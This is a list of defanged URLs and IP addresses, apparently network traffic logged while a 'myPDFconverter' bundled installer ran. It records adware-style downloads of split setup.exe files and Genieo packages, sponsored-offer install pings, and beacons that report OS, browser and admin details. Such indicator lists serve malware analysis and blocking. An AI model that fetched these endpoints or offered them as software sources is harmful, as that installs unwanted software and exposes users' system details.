    hxxp://app.mypdfconverter.com/step.php?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&mso=5&mss=3&stepid=0&sk=75a8db4f27f64c106caf6dbe67de418c 178.33.88.173
    hxxp://a1363.dscg.akamai.net/pki/crl/products/MicCodSigPCA_08-31-2010.crl
    hxxp://crl.globalsign.net/root.crl 108.162.232.200
    hxxp://crl.globalsign.net/gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhR5HFQnItXEGJJ9zEpk51tw== 108.162.232.200
    hxxp://www.theviilage.com/searchprotect/up?ptid=smt&sid=IHProtectPlugin&ln=en_us&ver=4.0.1.1716&uid=535559167_132775_B48A115F&dp=0 208.43.69.149
    hxxp://app.mypdfconverter.com/en/software/install/?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1 178.33.88.173
    hxxp://app.mypdfconverter.com/en/software/pixel?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&ua=Internet Explorer 10.0&sys=Windows 7&cookie=-1 178.33.88.173
    hxxp://app.mypdfconverter.com/images/myPDFconverter.png 178.33.88.173
    hxxp://app.mypdfconverter.com/images/pixel.gif 178.33.88.173
    hxxp://pagead.l.doubleclick.net/pagead/conversion.js
    hxxp://www-google-analytics.l.google.com/ga.js
    hxxp://pagead.l.doubleclick.net/pagead/conversion/1003450607/?random=1422513975534&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1
    hxxp://app.mypdfconverter.com/images/congratsBg.jpg 178.33.88.173
    hxxp://www-google-analytics.l.google.com/r/__utm.gif?utmwv=5.6.2&utms=1&utmn=40022683&utmhn=www.mypdfconverter.com&utmcs=utf-8&utmsr=1916x902&utmvp=1173x539&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=-&utmdt=Congratulations!&utmhid=1331959245&utmr=-&utmp=/0812929127/goal&utmht=1422513975626&utmac=UA-15433929-1&utmcc=__utma=14348971.1072120561.1422513976.1422513976.1422513976.1;+__utmz=14348971.1422513976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmjid=1198134741&utmredir=1&utmu=qACgAAAAAAAAAAAAAAAAAAAE~
    hxxp://shop.offerbox.com/eas?cu=23126;cre=img 178.33.88.163
    hxxp://www-google-analytics.l.google.com/r/__utm.gif?utmwv=5.6.2&utms=2&utmn=725233049&utmhn=www.mypdfconverter.com&utmcs=utf-8&utmsr=1916x902&utmvp=1173x539&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=-&utmdt=Congratulations!&utmhid=1331959245&utmr=-&utmp=/en/software/install/?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&utmht=1422513975648&utmac=UA-12585577-50&utmcc=__utma=14348971.1072120561.1422513976.1422513976.1422513976.1;+__utmz=14348971.1422513976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmjid=1037776761&utmredir=1&utmmt=1&utmu=rACgAAAAAAAAAAAAAAAAAAAE~
    hxxp://pagead.l.doubleclick.net/pagead/viewthroughconversion/1003450607/?random=251257950&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
    hxxp://shop.offerbox.com/pixel.gif 178.33.88.163
    hxxp://shop.offerbox.com/eas?cu=25386&eme=WBrHTc5N 178.33.88.163
    hxxp://shop.offerbox.com/eas?cu=5600;ty=pc 178.33.88.163
    hxxp://www.google.com/ads/conversion/1003450607/?random=251257950&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=455578018 173.194.113.212
    hxxp://www.google.com.ua/ads/conversion/1003450607/?random=251257950&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=455578018&ipr=y 173.194.113.215
    hxxp://d.addelive.com/widget/render/hash/a15f4808afa7ee780ddce01e1b0c543d 66.216.109.248
    hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w=
    hxxp://counter-817696455.us-east-1.elb.amazonaws.com/blank.gif?t=143985159011&h=a15f4808afa7ee780ddce01e1b0c543d&emp=1
    hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI=
    hxxp://app.mypdfconverter.com/images/favicon.ico 178.33.88.173
    hxxp://e6845.ce.akamaiedge.net/pca3.crl
    hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/xkCfyHfJr7GQ6M658NRZ4SHo/AQUCPVR6Pv+PT1kNnxoz1t4qN+5xTcCEGC2x6sSmevembHfY1acIZk=
    hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEGwkCSV07gf3g5QOsqmf+MY=
    hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8=
    hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s= 178.255.83.1
    hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2+iPob4twryIF+FfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa/LgCEBBwnU/1VAjXMGAB2OqRdbs= 178.255.83.1
    hxxp://ocsp.usertrust.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG+EAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQCEHQmdFrc480Fy/u/h0ldP 178.255.83.1
    hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS+zcBkvzl4=
    hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECEBuYvHdVmNDEAeDWzENJUpo=
    hxxp://dl.ourclientinputsrv.com/smt2b/all/hat/row/setup.exe_c 69.16.175.42
    hxxp://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl 88.221.133.16
    hxxp://bi.bisrv.com/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.7870902808395388
    hxxp://dl.ourclientinputsrv.com/smt2b/all/hat/row/setup.exe_b 69.16.175.42
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1422513850 54.231.0.212
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1422513853 54.231.0.212
    hxxp://as.perfcreatives.com/eas?cu=25386&eme=WBrHTc5N 178.33.88.164
    hxxp://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1 178.33.88.175
    hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= 23.43.139.27
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=700&n=deploy_ch_start_funnel_step_name&rnd=1422513835 54.231.0.212
    hxxp://bi.bisrv.com/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.20616356933149288
    hxxp://install.sourceapp.info/ii?alpha=eidVXnYRaD9QRktAenR5e2MGU3Z6e1l2e08UQU8zKHsfGTNvVjZ3XTo2HClnZicJTV84KG9RNmYgARxgfmwrVh4WJxVGdCltGhguR3ZMcyl4OhZePC91DSIACUpWHRx9a3w7di5GUS8aCng7LiIkLFh9eHpZPCpAZSd2AHYiNCRdFlIoFUJxLmVDWj0ELz0ydjo/Vw08OHdWUDRTRA5JIjwqVgomOQ8Afmo6Oi9VJiYvUBUDeFE7QjVgJAYDdigndiJfRyhyIWZ0OAcSY1MqRGkqbGQUTDZ8JAQ/JFUNQUMpOiNLRQ52CBd3WyczDUhAf28EVE05QTxMVCR+UlcjPCt2AFFINWlSYG0uARh6WXkzOmQ+JVIRLWoiATI1WQsRRTkpZkkZIHRLXzgZZmVfB2R6YA5cBw8PbABtJXkUGgUhK20LVARGUxM0fjhaTX1AKicmKjp7XkY8PWQNK3YQSFcefCEnBEhzJV5VIh1+b0tZLSYwWgwObAV/UVIbZlVANWNiTyNHRWdCUhZyOQceclo3QCAXS1gqH141YVsyAlkPDk8/aiNXG34uTR8lGV86FQdSeWM= 70.186.131.141
    hxxp://counter.d.addelive.com/blank.gif?t=143985159011&h=a15f4808afa7ee780ddce01e1b0c543d&emp=1 184.73.212.92
    hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?52d20c74d0048ebb 88.221.132.223
    hxxp://www.mypdfconverter.com/images/favicon.ico 178.33.88.175
    hxxp://www.googleadservices.com/pagead/conversion/1003450607/?random=1422513975534&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1 173.194.113.218
    hxxp://download.genieo.com/partner/gim394750002/release/live/partner_manifest.xml 54.231.244.1
    hxxp://bi.bisrv.com/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.7410277599261255
    hxxp://www.google-analytics.com/r/__utm.gif?utmwv=5.6.2&utms=2&utmn=725233049&utmhn=www.mypdfconverter.com&utmcs=utf-8&utmsr=1916x902&utmvp=1173x539&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=-&utmdt=Congratulations!&utmhid=1331959245&utmr=-&utmp=/en/software/install/?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&utmht=1422513975648&utmac=UA-12585577-50&utmcc=__utma=14348971.1072120561.1422513976.1422513976.1422513976.1;+__utmz=14348971.1422513976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmjid=1037776761&utmredir=1&utmmt=1&utmu=rACgAAAAAAAAAAAAAAAAAAAE~ 173.194.113.192
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=900&n=deploy_ff_start_funnel_step_name&rnd=1422513836 54.231.0.212
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1422513835 54.231.0.212
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=500&n=deploy_notification_start_funnel_step_name&rnd=1422513835 54.231.0.212
    hxxp://download.genieo.com/partner/gim394750002/release/r16741/genieo_setup.gen 54.231.244.1
    hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b77e166e5d8add6a 88.221.132.223
    hxxp://www.mypdfconverter.com/en/software/pixel?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&ua=Internet Explorer 10.0&sys=Windows 7&cookie=-1 178.33.88.175
    hxxp://stats.ourclientinputsrv.com/installer.gif?action=finished&app=65743&appver=21&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_21&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350025&asw=0&asw2=1073750533&asw3=-2147483648&asw4=0&crtnm=ColoColoApps&ieprofiles=1&chprofiles=na&ffprofiles=1&procstarttime=1422513827&procruntime=28&rnd=1422513855 54.231.16.188
    hxxp://crl.verisign.com/pca3.crl 23.43.133.163
    hxxp://crl.microsoft.com/pki/crl/products/WinPCA.crl 88.221.133.16
    hxxp://bi.bisrv.com/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.30974286226175074
    hxxp://bi.bisrv.com/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.28958118764499907
    hxxp://www.googleadservices.com/pagead/conversion.js 173.194.113.218
    hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEGwkCSV07gf3g5QOsqmf+MY= 23.43.139.27
    hxxp://googleads.g.doubleclick.net/pagead/viewthroughconversion/1003450607/?random=251257950&cv=7&fst=1422513975534&num=1&fmt=2&value=0&label=YJ0zCNGY5gEQ7-G93gM&bg=FFFFFF&hl=fr&guid=ON&u_h=902&u_w=1916&u_ah=858&u_aw=1916&u_cd=24&u_his=1&u_tz=120&u_java=true&u_nplug=0&u_nmime=0&frm=0&url=http://www.mypdfconverter.com/en/software/install/?campaign=14765&eme=&timestamp=1422513667886947&tracker=1995&tk=ec3c2d87ece6905cc4d836b510070b07&mso=5&mss=3&sed=8&suid=FDcTF3M9j&download_country=en&ms=5&status=5&ms2=0&status2=0&ms3=0&status3=0&sms=0&itime=1422513882&ps=0&p_status=1&vis=1&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 173.194.113.217
    hxxp://logs.ourclientinputsrv.com/monetization.gif?event=4&ibic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&starttime=1422513827&asw=0_1073750533_-2147483648_0&browser=ff,ie,de&rnd=1422513827 69.16.175.42
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=800&n=deploy_nova_start_funnel_step_name&rnd=1422513836 54.231.0.212
    hxxp://stats.ourclientinputsrv.com/apps.gif?action=install&app=65743&appver=21&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1422513827&lifetime=0&silent=1&crtnm=ColoColoApps&procstarttime=1422513827&procruntime=28&rnd=1422513855 54.231.16.188
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1422513842 54.231.0.212
    hxxp://dl.ourclientinputsrv.com/smt2b/all/hat/row/setup.exe_e 69.16.175.42
    hxxp://bi.bisrv.com/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=mystartsearch&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=1&index_in_screen=1&index_in_session=1&0.3823084710495085
    hxxp://www.mypdfconverter.com/images/congratsBg.jpg 178.33.88.175
    hxxp://js.ourclientinputsrv.com/plugin/apps/65743/manifest/1_36_01_22/ie10/manifest.xml?ver=21&rnd=6562 69.16.175.10
    hxxp://dl.newinputinfoservice.com/smt2b/all/hat/row/setup.exe 69.16.175.10
    hxxp://www.google-analytics.com/r/__utm.gif?utmwv=5.6.2&utms=1&utmn=40022683&utmhn=www.mypdfconverter.com&utmcs=utf-8&utmsr=1916x902&utmvp=1173x539&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=-&utmdt=Congratulations!&utmhid=1331959245&utmr=-&utmp=/0812929127/goal&utmht=1422513975626&utmac=UA-15433929-1&utmcc=__utma=14348971.1072120561.1422513976.1422513976.1422513976.1;+__utmz=14348971.1422513976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmjid=1198134741&utmredir=1&utmu=qACgAAAAAAAAAAAAAAAAAAAE~ 173.194.113.192
    hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEF1tL3zAt8MdpkWloaIHgTk= 23.43.139.27
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1422513835 54.231.0.212
    hxxp://stats.ourclientinputsrv.com/installer.gif?action=started&app=65743&appver=0&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_21&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350025&asw=0&asw2=1073750533&asw3=-2147483648&asw4=0&crtnm=ColoColoApps&procstarttime=1422513827&procruntime=4&rnd=1422513831 54.231.16.188
    hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8= 23.43.139.27
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=300&n=deploy_start_funnel_step_name&rnd=1422513832 54.231.0.212
    hxxp://bi.bisrv.com/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.4314217413277596
    hxxp://www.appshat.com/images/64x64.ico 173.194.71.121
    hxxp://as.perfcreatives.com/eas?cu=5600;ty=pc 178.33.88.164
    hxxp://download.genieo.com/core/release/r16741/framework_setup.gen 54.231.244.1
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=200&n=init_end_funnel_step_name&rnd=1422513832 54.231.0.212
    hxxp://www.appshat.com/images/16x16.ico 173.194.71.121
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1422513842 54.231.0.212
    hxxp://dl.ourclientinputsrv.com/smt2b/all/hat/row/setup.exe_a 69.16.175.42
    hxxp://www.google-analytics.com/ga.js 173.194.113.192
    hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECEBuYvHdVmNDEAeDWzENJUpo= 23.43.139.27
    hxxp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl 88.221.133.16
    hxxp://bi.bisrv.com/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=mystartsearch&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=1&index_in_screen=1&index_in_session=1&0.4327788826737436
    hxxp://js.ourclientinputsrv.com/plugin/apps/65743/manifest/1_36_01_22/ie10/manifest.xml?ver=21&rnd=6787 69.16.175.10
    hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS+zcBkvzl4= 23.43.139.27
    hxxp://www.mypdfconverter.com/images/myPDFconverter.png 178.33.88.175
    hxxp://bi.bisrv.com/pinger?event_type=offer_shown&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&display_height=90&0.8723355811491985
    hxxp://analytics.genieo.com/track?uid={E8BFA998-168D-400E-B9E0-F41B76A5DFC7}&partner=gim394750002&data=updater_ping=&revision_core=0&revision_updater=0&revision_partner=0&os_version=Microsoft Windows 7 Professional Service Pack 1 (build 7601), 64-bit&java_version=1.6 64.233.165.121
    hxxp://install.sourceapp.info/fp?alpha=eidVXnZYX00SEgEPenR5e2MGU3Z6e0MvN10mFEEqfTNYXjB4VlVeHXtkSC4mO0QjDgtnVTxeRntTcgdiYnpfLAAcImE2cy0JQU1gX3MuU2k5JlYSKG0/AipzBElVHGN/cxRKcipdXCEafWBJRSQgNFgKCXtZO1gpZyEEAHYtMXdTZmliRgAlNn5FSydSNyswZGk7Qwh7fHMIMnMNWVFJdy1/GUt3P1pVOB5xdRtaN3U2QFleagU5SmY7LGRaPyoscBYQcHBEGi50JxwMelNkM0wQTC0BTX5hIAAjdwxPVx58LTVVRRR2BQF3Xzt1PQ1xc28EXkgUHThVN2ImBjh2OjdwCg1lJR9CdF9+RUZSDiBSLXJNPlISW2UhBD93DE9ebmgPcXs8By0dRA87ZQEI 70.186.131.141
